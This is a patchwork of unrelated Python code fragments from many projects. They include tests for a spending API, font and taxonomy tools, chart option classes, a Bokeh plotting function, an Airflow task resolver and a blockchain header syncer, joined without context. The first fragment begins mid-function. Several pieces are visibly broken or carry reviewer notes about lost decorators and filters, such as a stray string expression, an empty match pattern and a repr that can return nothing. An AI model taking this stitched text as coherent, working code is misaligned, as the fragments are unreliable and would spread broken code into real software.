    process = subprocess.Popen(['jb', 'build', tocs.as_posix(), '--path-output', books.as_posix(), '--toc', toc.as_posix(), '--config', config.as_posix(), '-W'], stdout=subprocess.PIPE, stderr=subprocess.PIPE)
    stdout, stderr = process.communicate()
    assert process.returncode == 0, stderr
    path_toc_directive = books.joinpath('_build', 'html', 'index.html')
    soup = BeautifulSoup(path_toc_directive.read_text(encoding='utf8'), 'html.parser')
    toc = soup.select('nav.bd-links')[0]
    file_regression.check(toc.prettify(), basename=(toc_file.split('.')[0] + '_multitoc_numbering_false'), extension=f'{SPHINX_VERSION}.html')
# NOTE: the original decorator line read '.django_db' — the '@pytest.mark'
# prefix was lost (a syntax error as written); restored here.
@pytest.mark.django_db
def test_ignore_funding_for_unselected_defc(client, monkeypatch, helpers, defc_codes, basic_ref_data, year_2_gtas_covid, year_2_gtas_covid_2):
    """Only requested DEF codes with data contribute funding rows; totals sum over them."""
    helpers.patch_datetime_now(monkeypatch, LATE_YEAR, EARLY_MONTH, 25)
    helpers.reset_dabs_cache()
    resp = client.get(OVERVIEW_URL + '?def_codes=M,A')
    assert resp.data['funding'] == [{'amount': YEAR_2_GTAS_CALCULATIONS['total_budgetary_resources'], 'def_code': 'M'}]
    assert resp.data['total_budget_authority'] == YEAR_2_GTAS_CALCULATIONS['total_budgetary_resources']
    assert resp.data['spending']['total_obligations'] == YEAR_2_GTAS_CALCULATIONS['total_obligations']
    assert resp.data['spending']['total_outlays'] == YEAR_2_GTAS_CALCULATIONS['total_outlays']
    resp = client.get(OVERVIEW_URL + '?def_codes=M,N')
    assert resp.data['funding'] == [{'amount': YEAR_2_GTAS_CALCULATIONS['total_budgetary_resources'], 'def_code': 'M'}, {'amount': YEAR_2_GTAS_CALCULATIONS['total_budgetary_resources'], 'def_code': 'N'}]
    assert resp.data['total_budget_authority'] == YEAR_2_GTAS_CALCULATIONS['total_budgetary_resources'] * 2
    assert resp.data['spending']['total_obligations'] == YEAR_2_GTAS_CALCULATIONS['total_obligations'] * 2
    assert resp.data['spending']['total_outlays'] == YEAR_2_GTAS_CALCULATIONS['total_outlays'] * 2
class OptionPlotoptionsColumnSonificationDefaultinstrumentoptionsMappingHighpassFrequency(Options):
    """Highpass-frequency mapping options.

    The original flat code defined each name twice (getter then setter) with no
    decorators, so the second def shadowed the first and the getters were
    unreachable; restored as the property/setter pattern this accessor style
    (_config_get/_config) implies.
    """

    @property
    def mapFunction(self):
        return self._config_get(None)

    @mapFunction.setter
    def mapFunction(self, value: Any):
        self._config(value, js_type=False)

    @property
    def mapTo(self):
        return self._config_get(None)

    @mapTo.setter
    def mapTo(self, text: str):
        self._config(text, js_type=False)

    @property
    def max(self):
        return self._config_get(None)

    @max.setter
    def max(self, num: float):
        self._config(num, js_type=False)

    @property
    def min(self):
        return self._config_get(None)

    @min.setter
    def min(self, num: float):
        self._config(num, js_type=False)

    @property
    def within(self):
        return self._config_get(None)

    @within.setter
    def within(self, value: Any):
        self._config(value, js_type=False)
def plot_partial_pooling_model(samples: MonteCarloSamples, df: pd.DataFrame) -> Figure:
    """Bokeh plot of partially pooled posterior hit-rate estimates vs. observed rates.

    Shows the population mean line, per-player posterior means with 89% HDI
    whiskers, and the observed hit/at-bat ratios.
    """
    diagnostics_data = _sample_data_prep(samples, df)
    hdi_df = az.hdi(diagnostics_data, hdi_prob=0.89).to_dataframe()
    hdi_df = hdi_df.T.rename(columns={'lower': 'hdi_11%', 'higher': 'hdi_89%'})
    summary_df = az.summary(diagnostics_data, round_to=4).join(hdi_df)
    # NOTE(review): contains('') matches every row — presumably a parameter-name
    # filter (e.g. 'theta') was lost from this string; confirm the intended filter.
    theta_index = summary_df[summary_df.index.astype(str).str.contains('')].index.values
    x = (df['Current hits'] / df['Current at-bats']).values
    y = summary_df.loc[theta_index, 'mean']
    upper_hdi = summary_df.loc[theta_index, 'hdi_89%']
    lower_hdi = summary_df.loc[theta_index, 'hdi_11%']
    population_mean = (df['Current hits'] / df['Current at-bats']).mean()
    source = ColumnDataSource({'x': x, 'y': y, 'upper_hdi': upper_hdi, 'lower_hdi': lower_hdi, 'name': df['Name'].values})
    plot = figure(plot_width=500, plot_height=500, title='Partial pooling', x_axis_label='Observed hits / at-bats', y_axis_label='Predicted chance of a hit', x_range=[0.14, 0.41], y_range=[0.05, 0.55])
    plot.line(x=[0, 1], y=[population_mean, population_mean], line_color='orange', line_width=3, level='underlay', legend_label='Population mean')
    # NOTE(review): 'lower_std'/'upper_std' are not columns of `source`, so this
    # band cannot render as-is — confirm the intended data columns.
    std_band = Band(base='x', lower='lower_std', upper='upper_std', source=source, level='underlay', fill_alpha=0.2, fill_color='orange', line_width=0.2, line_color='orange')
    plot.add_layout(std_band)
    plot.line(x=x, y=(df['Current hits'] / df['Current at-bats']).values, line_color='grey', line_alpha=0.7, line_width=2.0, legend_label='Current hits / Current at-bats')
    whiskers = Whisker(base='x', upper='upper_hdi', lower='lower_hdi', source=source, line_color='steelblue')
    whiskers.upper_head.line_color = 'steelblue'
    whiskers.lower_head.line_color = 'steelblue'
    plot.add_layout(whiskers)
    glyph = plot.circle(x='x', y='y', source=source, size=10, line_color='white', fill_color='steelblue', legend_label='Players')
    # FIX: Bokeh tooltip value specs must reference data columns with '@'; the
    # original strings had lost their '@field' prefixes ('', '_hdi{0.000}', ...)
    # and would have rendered as literal text.
    tooltips = HoverTool(renderers=[glyph], tooltips=[('Name', '@name'), ('Posterior Upper HDI', '@upper_hdi{0.000}'), ('Posterior Mode', '@y{0.000}'), ('Posterior Lower HDI', '@lower_hdi{0.000}')])
    plot.add_tools(tooltips)
    plot.legend.location = 'top_left'
    plot.legend.click_policy = 'mute'
    plots.style(plot)
    return plot
def test_documentLib(tmpdir):
    """Round-trip a designspace document and verify its lib dict survives write/read."""
    tmpdir = str(tmpdir)
    doc_path = os.path.join(tmpdir, 'testDocumentLibTest.designspace')
    doc = DesignSpaceDocument()
    axis = AxisDescriptor()
    axis.tag = 'TAGA'
    axis.name = 'axisName_a'
    axis.minimum = 0
    axis.maximum = 1000
    axis.default = 0
    doc.addAxis(axis)
    dummyData = {'a': 123, 'b': 'abc', 'c': [1, 2, 3], 'd': {'a': 123}}
    dummyKey = 'org.fontTools.designspaceLib'
    doc.lib = {dummyKey: dummyData}
    doc.write(doc_path)
    reloaded = DesignSpaceDocument()
    reloaded.read(doc_path)
    assert dummyKey in reloaded.lib
    assert reloaded.lib[dummyKey] == dummyData
def run(args):
    """CLI entry: query the local NCBI taxonomy DB and dump a tree, descendant
    table, or lineage info for the requested taxa/names."""
    import re
    from .. import PhyloTree, NCBITaxa
    if (not args.tree) and (not args.info) and (not args.descendants):
        args.tree = True
    ncbi = NCBITaxa(args.dbfile, args.taxdumpfile)
    if args.create:
        # --create only sets up the database; nothing more to do.
        sys.exit(0)
    all_taxids = {}
    all_names = set()
    queries = []
    # BUG FIX: these dicts are written in the fuzzy-search branch below but were
    # never initialized, raising NameError on any successful fuzzy match.
    name2realname = {}
    name2score = {}
    if not args.search:
        log.error('Search terms should be provided (i.e. --search) ')
        sys.exit(-1)
    for n in args.search:
        queries.append(n)
        try:
            all_taxids[int(n)] = None
        except ValueError:
            all_names.add(n.strip())
    name2tax = ncbi.get_name_translator(all_names)
    for tids in name2tax.values():
        for tid in tids:
            all_taxids[tid] = None
    not_found_names = all_names - set(name2tax.keys())
    if args.fuzzy and not_found_names:
        log.warn('%s unknown names', len(not_found_names))
        for name in not_found_names:
            tax, realname, sim = ncbi.get_fuzzy_name_translation(name, args.fuzzy)
            if tax:
                all_taxids[tax] = None
                name2tax[name] = [tax]
                name2realname[name] = realname
                name2score[name] = 'Fuzzy:%0.2f' % sim
    if not_found_names:
        log.warn('[%s] could not be translated into taxids!' % ','.join(not_found_names))
    if args.tree:
        if len(all_taxids) == 1:
            target_taxid = list(all_taxids.keys())[0]
            log.info('Dumping NCBI descendants tree for %s' % target_taxid)
            t = ncbi.get_descendant_taxa(target_taxid, collapse_subspecies=args.collapse_subspecies, rank_limit=args.rank_limit, return_tree=True)
        else:
            log.info('Dumping NCBI taxonomy of %d taxa...' % len(all_taxids))
            t = ncbi.get_topology(list(all_taxids.keys()), intermediate_nodes=args.full_lineage, rank_limit=args.rank_limit, collapse_subspecies=args.collapse_subspecies)
        id2name = ncbi.get_taxid_translator([n.name for n in t.traverse()])
        for n in t.traverse():
            n.add_properties(taxid=n.name)
            n.add_properties(sci_name=str(id2name.get(int(n.name), '?')))
            n.name = '%s - %s' % (id2name.get(int(n.name), n.name), n.name)
            lineage = ncbi.get_lineage(n.taxid)
            n.add_properties(named_lineage='|'.join(ncbi.translate_to_names(lineage)))
        dump(t, properties=['taxid', 'name', 'rank', 'bgcolor', 'sci_name', 'collapse_subspecies', 'named_lineage'])
    elif args.descendants:
        log.info('Dumping NCBI taxonomy of %d taxa...' % len(all_taxids))
        print('# ' + '\t'.join(['Taxid', 'Sci.Name', 'Rank', 'descendant_taxids', 'descendant_names']))
        translator = ncbi.get_taxid_translator(all_taxids)
        ranks = ncbi.get_rank(all_taxids)
        for taxid in all_taxids:
            descendants = ncbi.get_descendant_taxa(taxid, collapse_subspecies=args.collapse_subspecies, rank_limit=args.rank_limit)
            print('\t'.join([str(taxid), translator.get(taxid, taxid), ranks.get(taxid, ''), '|'.join(map(str, descendants)), '|'.join(map(str, ncbi.translate_to_names(descendants)))]))
    elif args.info:
        print('# ' + '\t'.join(['Taxid', 'Sci.Name', 'Rank', 'Named Lineage', 'Taxid Lineage']))
        translator = ncbi.get_taxid_translator(all_taxids)
        ranks = ncbi.get_rank(all_taxids)
        for taxid, name in translator.items():
            lineage = ncbi.get_lineage(taxid)
            named_lineage = ','.join(ncbi.translate_to_names(lineage))
            lineage_string = ','.join(map(str, lineage))
            print('\t'.join([str(taxid), name, ranks.get(taxid, ''), named_lineage, lineage_string]))
class AirflowTaskResolver(TrackedInstance, TaskResolverMixin):
    """Task resolver that reconstructs Airflow operators/sensors/triggers from
    serialized loader arguments (module path, class name, jsonpickled config)."""

    def name(self) -> str:
        # NOTE(review): TaskResolverMixin implementations typically expose this
        # as a property; a decorator may have been stripped upstream — confirm.
        return 'AirflowTaskResolver'
    # NOTE(review): stray expression — it looks like the argument of a stripped
    # decorator (e.g. timeit('Load airflow task')); left untouched.
    ('Load airflow task')
    def load_task(self, loader_args: typing.List[str]) -> typing.Union[(airflow_models.BaseOperator, airflow_sensors.BaseSensorOperator, airflow_triggers.BaseTrigger)]:
        """Rebuild the task object from loader args of the form
        ['task-module', <module>, 'task-name', <class>, 'task-config', <jsonpickle>]."""
        (_, task_module, _, task_name, _, task_config) = loader_args
        task_module = importlib.import_module(name=task_module)
        task_def = getattr(task_module, task_name)
        return task_def(name=task_name, task_config=jsonpickle.decode(task_config))

    def loader_args(self, settings: SerializationSettings, task: PythonAutoContainerTask) -> typing.List[str]:
        """Inverse of :meth:`load_task`: flatten a task into key/value loader args."""
        return ['task-module', task.__module__, 'task-name', task.__class__.__name__, 'task-config', jsonpickle.encode(task.task_config)]

    def get_all_tasks(self) -> typing.List[PythonAutoContainerTask]:
        """Not supported for this resolver."""
        raise Exception('should not be needed')
def test_id_included(caplog):
    """An explicitly included test id must be selected, with the expected log trail."""
    test_id = '1.1'
    test_level = 1
    cfg = SimpleNamespace(includes=['1.1'], excludes=None, level=0, log_level='DEBUG')
    audit = CISAudit(config=cfg)
    outcome = audit._is_test_included(test_id, test_level)
    expected_messages = [
        f'Checking whether to run test {test_id}',
        f'Test {test_id} was explicitly included',
        f'Including test {test_id}',
    ]
    # Order, content and count of records all checked in one comparison.
    assert [record.msg for record in caplog.records] == expected_messages
    assert outcome is True
class OptionPlotoptionsWindbarbSonificationDefaultinstrumentoptionsMappingVolume(Options):
    """Volume mapping options.

    The original flat code defined each name twice (getter then setter) with no
    decorators, so the second def shadowed the first and the getters were
    unreachable; restored as the property/setter pattern this accessor style
    (_config_get/_config) implies.
    """

    @property
    def mapFunction(self):
        return self._config_get(None)

    @mapFunction.setter
    def mapFunction(self, value: Any):
        self._config(value, js_type=False)

    @property
    def mapTo(self):
        return self._config_get(None)

    @mapTo.setter
    def mapTo(self, text: str):
        self._config(text, js_type=False)

    @property
    def max(self):
        return self._config_get(None)

    @max.setter
    def max(self, num: float):
        self._config(num, js_type=False)

    @property
    def min(self):
        return self._config_get(None)

    @min.setter
    def min(self, num: float):
        self._config(num, js_type=False)

    @property
    def within(self):
        return self._config_get(None)

    @within.setter
    def within(self, value: Any):
        self._config(value, js_type=False)
class Test_SetWindowSet:
    """Tests for SetWindowSet: add/discard delegate to _apply_set_operation,
    which applies the operation to every window range of the key."""

    # The bare '()' lines in the original were decorators stripped down to their
    # call parentheses; restored as pytest fixtures. Test methods request them
    # by name (the `key` and `table` fixtures are expected from a shared
    # base class or conftest — confirm).
    @pytest.fixture()
    def wrapper(self):
        return Mock(name='wrapper')

    @pytest.fixture()
    def wset(self, *, key, table, wrapper):
        return SetWindowSet(key, table, wrapper)

    def test_add(self, *, wset):
        event = Mock(name='event')
        wset._apply_set_operation = Mock()
        wset.add('value', event=event)
        wset._apply_set_operation.assert_called_once_with('add', 'value', event)

    def test_discard(self, *, wset):
        event = Mock(name='event')
        wset._apply_set_operation = Mock()
        wset.discard('value', event=event)
        wset._apply_set_operation.assert_called_once_with('discard', 'value', event)

    def test__apply_set_operation(self, *, wset, key, table, wrapper):
        event = Mock(name='event')
        wrange1 = Mock(name='window_range1')
        wrange2 = Mock(name='window_range2')
        table._window_ranges.return_value = [wrange1, wrange2]
        wset._apply_set_operation('op', 'value', event)
        wset.wrapper.get_timestamp.assert_called_once_with(event)
        wrapper.on_set_key.assert_called_once_with(key, 'value')
        table._get_key.assert_has_calls([call((key, wrange1)), call().op('value'), call((key, wrange2)), call().op('value')])
class FillMissingWithMean(elmdptt.TaskOneToOne):
    """Impute NaNs with column means, for all columns or a comma-separated list."""

    col_names = luigi.Parameter()  # 'all' or 'colA,colB,...'

    def actual_task_code(self, df: pd.DataFrame):
        """Fill missing values in place and return the DataFrame."""
        if self.col_names == 'all':
            df.fillna(df.mean(), inplace=True)
            return df
        for col_name in str(self.col_names).split(','):
            df[col_name].fillna(df[col_name].mean(), inplace=True)
        return df
# NOTE: the original decorator line read '.WebInterfaceUnitTestConfig(...)' —
# the '@pytest.mark' prefix was lost (a syntax error as written); restored here.
@pytest.mark.WebInterfaceUnitTestConfig(database_mock_class=DbMock)
class TestShowStatistic:
    """Tests for the /statistic page with and without stats in the DB mock."""

    def test_no_stats_available(self, test_client):
        DbMock.result = None
        rv = test_client.get('/statistic')
        assert b'General' not in rv.data
        assert b'<strong>No statistics available!</strong>' in rv.data

    def test_stats_available(self, test_client):
        DbMock.result = {'number_of_firmwares': 1, 'total_firmware_size': 1, 'average_firmware_size': 1, 'number_of_unique_files': 1, 'total_file_size': 10, 'average_file_size': 10, 'creation_time': time(), 'benchmark': 1.1}
        page_content = test_client.get('/statistic').data.decode()
        assert 'General' in page_content
        assert '>10.00 Byte<' in page_content
def main():
    """Migrate firmware and comparison entries from MongoDB to PostgreSQL."""
    config.load()
    postgres = BackendDbInterface()
    mongo_config = ConfigParser()
    mongo_config.read(Path(__file__).parent / 'config' / 'migration.cfg')
    try:
        with ConnectTo(MigrationMongoInterface, mongo_config) as db:
            with Progress(DESCRIPTION, BarColumn(), PERCENTAGE, TimeElapsedColumn()) as progress:
                migrator = DbMigrator(postgres=postgres, mongo=db, progress=progress)
                migrated_fw_count = migrator.migrate_fw(query={}, root=True, label='firmwares')
                if migrated_fw_count:
                    print(f'Successfully migrated {migrated_fw_count} firmware DB entries')
                else:
                    print('No firmware to migrate')
            migrate_comparisons(db)
    except errors.ServerSelectionTimeoutError:
        logging.error('Could not connect to MongoDB database.\n\tIs the server running and the configuration in `src/config/migration.cfg` correct?\n\tThe database can be started with `mongod --config config/mongod.conf`.')
        sys.exit(1)
def test_get_invalid_business_category_display_names():
    """Unknown field names should be ignored by the display-name lookup."""
    field_names = _get_all_business_category_field_names()
    field_names.insert(0, 'invalid_name_1')
    field_names.append('invalid_name_2')
    expected = _get_all_business_category_display_names()
    assert get_business_category_display_names(field_names) == expected
def test_resize():
    """Resizing and combining primitive types yields the expected widened types."""
    widened_int = Integer.int32_t().resize(64)
    assert widened_int == Integer.int64_t()
    widened_float = Float.float().resize(64)
    assert widened_float == Float.double()
    assert Integer.uint8_t() + Integer.int16_t() == Integer(24, signed=False)
    assert CustomType.void() + CustomType.void() == CustomType.void()
    combined_size = CustomType.bool().size + Float.float().size
    assert combined_size == CustomType('bool', 32 + SIZEOF_BOOL).size
def test_simple_plot(tmpdir, show_plot, generate_plot):
    """Render a cross-section with a well and ten vertically shifted surfaces."""
    well = xtgeo.well_from_file(USEFILE4)
    base_surface = xtgeo.surface_from_file(USEFILE2)
    surfaces = []
    for i in range(10):
        shifted = base_surface.copy()
        shifted.values = shifted.values + (i * 20)
        shifted.name = f'Surface_{i}'
        surfaces.append(shifted)
    myplot = XSection(zmin=1500, zmax=1800, well=well, surfaces=surfaces)
    clist = [0, 1, 222, 3, 5, 7, 3, 12, 11, 10, 9, 8]
    cfil1 = 'xtgeo'
    cfil2 = TPATH / 'etc/colortables/colfacies.txt'
    assert 222 in clist
    assert 'xtgeo' in cfil1
    assert 'colfacies' in str(cfil2)
    myplot.colormap = cfil1
    myplot.canvas(title='Manamana', subtitle='My Dear Well')
    myplot.plot_surfaces(fill=False)
    myplot.plot_well(zonelogname='Zonelog')
    if show_plot:
        myplot.show()
    if generate_plot:
        myplot.savefig(join(tmpdir, 'xsect_gbf1.png'), last=True)
    else:
        myplot.close()
def flatten_coords(in_coords):
    """Recursively flatten glyph data into order-insensitive, hashable tuples.

    Handles glyf components, objects with coordinate arrays, composite glyphs,
    plain lists, and empty glyphs; anything unrecognized flattens to ().
    """
    if isinstance(in_coords, g_l_y_f.GlyphComponent):
        return in_coords.getComponentInfo()
    elif hasattr(in_coords, 'coordinates'):
        ret = list(in_coords.coordinates)
        ret.sort()
        return tuple(ret)
    elif hasattr(in_coords, 'components'):
        ret = [flatten_coords(tmp) for tmp in in_coords.components]
        ret.sort()
        return tuple(ret)
    elif isinstance(in_coords, list):
        # BUG FIX: the original wrapped the whole list in a single generator —
        # [flatten_coords(<genexpr>)] — so the generator fell through to the
        # final else and the result always collapsed to ((),) instead of
        # flattening each element.
        ret = [flatten_coords(subitem) for subitem in in_coords]
        ret.sort()
        return tuple(ret)
    elif hasattr(in_coords, 'numberOfContours') and in_coords.numberOfContours == 0:
        # Empty glyph: nothing to compare.
        return tuple()
    else:
        return tuple()
class SkeletonSyncer(Service, Generic[TChainPeer]):
    """Download a sparse "skeleton" of block headers from a single peer.

    Fetches widely spaced (parent, child) header pairs, validates their links,
    spot-fills one randomly chosen gap per round, and emits validated header
    segments through an internal queue (consumed via :meth:`skeleton_segments`).
    """

    # Stride between skeleton samples: one full fetch batch plus one.
    _skip_length = (MAX_HEADERS_FETCH + 1)
    max_reorg_depth = MAX_SKELETON_REORG_DEPTH
    # Completed, validated header segments awaiting consumption.
    _fetched_headers: 'asyncio.Queue[Tuple[BlockHeaderAPI, ...]]'

    def __init__(self, chain: AsyncChainAPI, db: BaseAsyncHeaderDB, peer: TChainPeer, launch_strategy: SyncLaunchStrategyAPI=None) -> None:
        """Prepare a syncer for *peer*; defaults to syncing from genesis."""
        self.logger = get_logger('trinity.sync.common.headers.SkeletonSyncer')
        self._chain = chain
        self._db = db
        if (launch_strategy is None):
            launch_strategy = FromGenesisLaunchStrategy(db)
        self._launch_strategy = launch_strategy
        self.peer = peer
        # Bound the queue so a slow consumer applies back-pressure to fetching.
        max_pending_headers = (peer.max_headers_fetch * 8)
        self._fetched_headers = asyncio.Queue(max_pending_headers)

    async def skeleton_segments(self) -> AsyncIterator[Tuple[(BlockHeaderAPI, ...)]]:
        """Yield validated header segments as they become available."""
        while self.manager.is_running:
            (yield (await self._fetched_headers.get()))
            self._fetched_headers.task_done()

    async def run(self) -> None:
        """Service entry point: fetch the full skeleton, then wait for the queue to drain."""
        self.manager.run_daemon_task(self._display_stats)
        try:
            (await self._quietly_fetch_full_skeleton())
            self.logger.debug2('Skeleton %s stopped responding, pausing for headers to emit', self.peer)
            # Wait until the consumer has processed every queued segment.
            (await self._fetched_headers.join())
        except asyncio.CancelledError:
            self.logger.debug('Skeleton syncer had %d pending headers when it was cancelled', self._fetched_headers.qsize())
            raise
        self.logger.debug2('Skeleton %s emitted all headers', self.peer)
        self.manager.cancel()

    async def _display_stats(self) -> None:
        """Log the queue fill level every five seconds while running."""
        queue = self._fetched_headers
        while self.manager.is_running:
            (await asyncio.sleep(5))
            self.logger.debug('Skeleton header queue is %d/%d full', queue.qsize(), queue.maxsize)

    async def _quietly_fetch_full_skeleton(self) -> None:
        """Run the fetch loop, downgrading expected failures to log messages."""
        try:
            (await self._fetch_full_skeleton())
        except ValidationError as exc:
            self.logger.debug('Exiting sync and booting %s due to validation error: %s', self.peer, exc)
        except asyncio.TimeoutError:
            self.logger.warning('Timeout waiting for header batch from %s, halting sync', self.peer)

    async def _fetch_full_skeleton(self) -> None:
        """Main loop: fetch spaced (parent, child) pairs, validate links,
        spot-fill one random gap per round, and queue the resulting segments."""
        peer = self.peer
        launch_headers = (await self._find_launch_headers(peer))
        self._fetched_headers.put_nowait(launch_headers)
        previous_tail_header = launch_headers[(- 1)]
        start_num = BlockNumber((previous_tail_header.block_number + self._skip_length))
        while self.manager.is_running:
            # Two staggered requests yield (parent, child) pairs one block apart.
            parents = (await self._fetch_headers_from(peer, start_num))
            if (not parents):
                break
            children = (await self._fetch_headers_from(peer, BlockNumber((start_num + 1))))
            if (not children):
                break
            pairs = tuple(zip(parents, children))
            try:
                validate_pair_coros = (self._chain.coro_validate_chain(parent, (child,)) for (parent, child) in pairs)
                (await asyncio.gather(*validate_pair_coros))
            except ValidationError as e:
                self.logger.warning('Received an invalid header pair from %s: %s', peer, e)
                raise
            if (len(pairs) >= 2):
                # Spot-check the peer by fully downloading one randomly chosen gap.
                gap_index = randrange(0, (len(pairs) - 1))
                segments = (await self._fill_in_gap(peer, pairs, gap_index))
                if (len(segments) == 0):
                    raise ValidationError('Unexpected - filling in gap silently returned no headers')
            else:
                segments = pairs
            previous_lead_header = segments[0][0]
            previous_tail_header = segments[(- 1)][(- 1)]
            self.logger.debug('Got new header bones from %s: %s-%s', peer, previous_lead_header, previous_tail_header)
            for segment in segments:
                if (len(segment) > 0):
                    (await self._fetched_headers.put(segment))
                else:
                    raise ValidationError(f'Found empty header segment in {segments}')
            start_num = BlockNumber(((previous_tail_header.block_number + self._skip_length) - 1))
        # The peer stopped returning skeleton batches; drain its remaining headers.
        (await self._get_final_headers(peer, previous_tail_header))

    async def _get_final_headers(self, peer: TChainPeer, previous_tail_header: BlockHeaderAPI) -> None:
        """Fetch the contiguous run of headers beyond the last skeleton point."""
        while self.manager.is_running:
            final_headers = (await self._fetch_headers_from(peer, BlockNumber((previous_tail_header.block_number + 1)), skip=0))
            if (len(final_headers) == 0):
                break
            (await self._chain.coro_validate_chain(previous_tail_header, final_headers, SEAL_CHECK_RANDOM_SAMPLE_RATE))
            (await self._fetched_headers.put(final_headers))
            previous_tail_header = final_headers[(- 1)]

    async def _find_newest_matching_skeleton_header(self, peer: TChainPeer) -> BlockHeaderAPI:
        """Return the newest locally imported header among widely spaced samples
        of the peer's chain; raise ValidationError when no common ancestor exists."""
        start_num = (await self._launch_strategy.get_starting_block_number())
        skip = (MAX_HEADERS_FETCH - 1)
        skeleton_launch_headers = (await self._fetch_headers_from(peer, start_num, skip=skip))
        if (len(skeleton_launch_headers) == 0):
            raise ValidationError(f'{peer} gave 0 headers when seeking common skeleton ancestors from {start_num}')
        first = skeleton_launch_headers[0]
        first_is_present = (await self._is_header_imported(first))
        if (not first_is_present):
            (await self._log_ancester_failure(peer, first))
            raise ValidationError(f'No common ancestor with {peer}, who started with {first}')
        elif (len(skeleton_launch_headers) == 1):
            return skeleton_launch_headers[0]
        else:
            for (parent, child) in sliding_window(2, skeleton_launch_headers):
                is_present = (await self._is_header_imported(child))
                if (not is_present):
                    return parent
            else:
                # Every sampled header is already imported locally.
                return skeleton_launch_headers[(- 1)]

    async def _is_header_imported(self, header: BlockHeaderAPI) -> bool:
        """True only if the header exists locally AND has a score (fully imported)."""
        if (not (await self._db.coro_header_exists(header.hash))):
            return False
        else:
            try:
                (await self._db.coro_get_score(header.hash))
            except HeaderNotFound:
                return False
            else:
                return True

    async def _find_launch_headers(self, peer: TChainPeer) -> Tuple[(BlockHeaderAPI, ...)]:
        """Determine the first batch of headers to sync, skipping already-stored ones."""
        newest_matching_header = (await self._find_newest_matching_skeleton_header(peer))
        start_num = BlockNumber((newest_matching_header.block_number + 1))
        launch_headers = (await self._fetch_headers_from(peer, start_num, skip=0))
        if (len(launch_headers) == 0):
            raise ValidationError(f'{peer} gave 0 headers when seeking common meat ancestors from {start_num}')
        (completed_headers, new_headers) = (await skip_complete_headers(launch_headers, self._is_header_imported))
        if completed_headers:
            self.logger.debug('During header sync launch, skipping over (%d) already stored headers %s: %s..%s', len(completed_headers), humanize_integer_sequence((h.block_number for h in completed_headers)), completed_headers[0], completed_headers[(- 1)])
        if (len(new_headers) == 0):
            self.logger.debug('Canonical head updated while finding new head from %s, returning old %s instead', peer, launch_headers[(- 1)])
            return (launch_headers[(- 1)],)
        else:
            try:
                launch_parent = (await self._db.coro_get_block_header_by_hash(new_headers[0].parent_hash))
            except HeaderNotFound as exc:
                raise ValidationError(f'First header {new_headers[0]} did not have parent in DB') from exc
            (await self._chain.coro_validate_chain(launch_parent, new_headers, SEAL_CHECK_RANDOM_SAMPLE_RATE))
            return new_headers

    async def _fill_in_gap(self, peer: TChainPeer, pairs: Tuple[(Tuple[(BlockHeaderAPI, ...)], ...)], gap_index: int) -> Tuple[(Tuple[(BlockHeaderAPI, ...)], ...)]:
        """Download and validate every header between pair *gap_index* and the
        next pair; return *pairs* with that gap spliced into the child pair."""
        if (not (0 <= gap_index < (len(pairs) - 1))):
            raise ValidationError(f'Tried to fill gap #{gap_index} in skeleton, with only {(len(pairs) - 1)} gaps')
        gap_parent = pairs[gap_index][(- 1)]
        gap_child = pairs[(gap_index + 1)][0]
        start_num = BlockNumber((gap_parent.block_number + 1))
        max_headers = ((gap_child.block_number - gap_parent.block_number) - 1)
        gap_headers = (await self._fetch_headers_from(peer, start_num, max_headers, skip=0))
        if (len(gap_headers) == 0):
            self.logger.warning('Skeleton %s could not fill header gap with headers at %s', peer, start_num)
            raise ValidationError(f'Skeleton {peer} could not return headers at {start_num}')
        filled_gap_children = tuple(concatv(gap_headers, pairs[(gap_index + 1)]))
        try:
            (await self._chain.coro_validate_chain(gap_parent, filled_gap_children, SEAL_CHECK_RANDOM_SAMPLE_RATE))
        except ValidationError:
            self.logger.warning('%s returned an invalid gap for index %s, with pairs %s, filler %s', peer, gap_index, pairs, gap_headers)
            raise
        else:
            return tuple(concatv(pairs[:(gap_index + 1)], (filled_gap_children,), pairs[(gap_index + 2):]))

    async def _fetch_headers_from(self, peer: TChainPeer, start_at: BlockNumber, max_headers: int=None, skip: int=None) -> Tuple[(BlockHeaderAPI, ...)]:
        """Request up to *max_headers* headers from *peer*; returns () on
        disconnect, timeout, or an invalid response."""
        if (not peer.is_alive):
            self.logger.info('%s disconnected while fetching headers', peer)
            return tuple()
        if (skip is not None):
            derived_skip = skip
        else:
            derived_skip = self._skip_length
        if (max_headers is None):
            header_limit = peer.max_headers_fetch
        else:
            header_limit = min(max_headers, peer.max_headers_fetch)
        try:
            self.logger.debug('Requsting chain of headers from %s starting at #%d', peer, start_at)
            headers = (await peer.chain_api.get_block_headers(start_at, header_limit, derived_skip, reverse=False))
            self.logger.debug2('sync received new headers: %s', loggable(headers))
        except PeerConnectionLost:
            self.logger.debug('Lost connection to %s while retrieving headers', peer)
            return tuple()
        except asyncio.TimeoutError:
            self.logger.debug('Timeout waiting for headers (skip=%s) from %s', skip, peer)
            return tuple()
        except ValidationError as err:
            self.logger.warning('Invalid header response sent by peer %s: %s', peer, err)
            return tuple()
        if (not headers):
            self.logger.debug2('Got no new headers from %s, exiting skeleton sync', peer)
            return tuple()
        else:
            return headers

    async def _log_ancester_failure(self, peer: TChainPeer, first_header: BlockHeaderAPI) -> None:
        """Log diagnostics when no common ancestor with *peer* can be found."""
        self.logger.info('Unable to find common ancestor betwen our chain and %s', peer)
        block_num = first_header.block_number
        try:
            local_header = (await self._db.coro_get_canonical_block_header_by_number(block_num))
        except HeaderNotFound as exc:
            self.logger.debug('Could not find any header at #%d: %s', block_num, exc)
            local_header = None
        self.logger.debug('%s returned starting header %s, which is not in our DB. Instead at #%d, our is header %s', peer, first_header, block_num, local_header)
def manage_prescriptions(invoiced, ref_dt, ref_dn, dt, created_check_field):
    """Propagate the invoiced flag to the document created from a prescription.

    If the reference document's ``created_check_field`` indicates that a
    ``dt`` document was created from prescription ``ref_dn``, mark that
    document's ``invoiced`` field accordingly; otherwise do nothing.
    """
    if not frappe.db.get_value(ref_dt, ref_dn, created_check_field):
        return
    created_doc_name = frappe.db.get_value(dt, {'prescription': ref_dn})
    frappe.db.set_value(dt, created_doc_name, 'invoiced', invoiced)
class SynthesizeRule(SemanticRule):
    """A semantic rule that synthesizes an attribute on the node itself.

    The computed value is stored under ``('self', target)``, where ``target``
    falls back to the rule's name when not given.
    """

    def __init__(self, func, arguments, dependencies, name, source_location=None, annotations=None, target=None):
        super().__init__(func, arguments, dependencies, name, source_location, annotations)
        # Synthesized attributes always live on the node's own scope.
        self.target = ('self', (target or name))

    def __repr__(self):
        if self.source_location:
            file, line = self.source_location
            return f'SynthesizeRule {self.name} (File "{file}", line {line})'
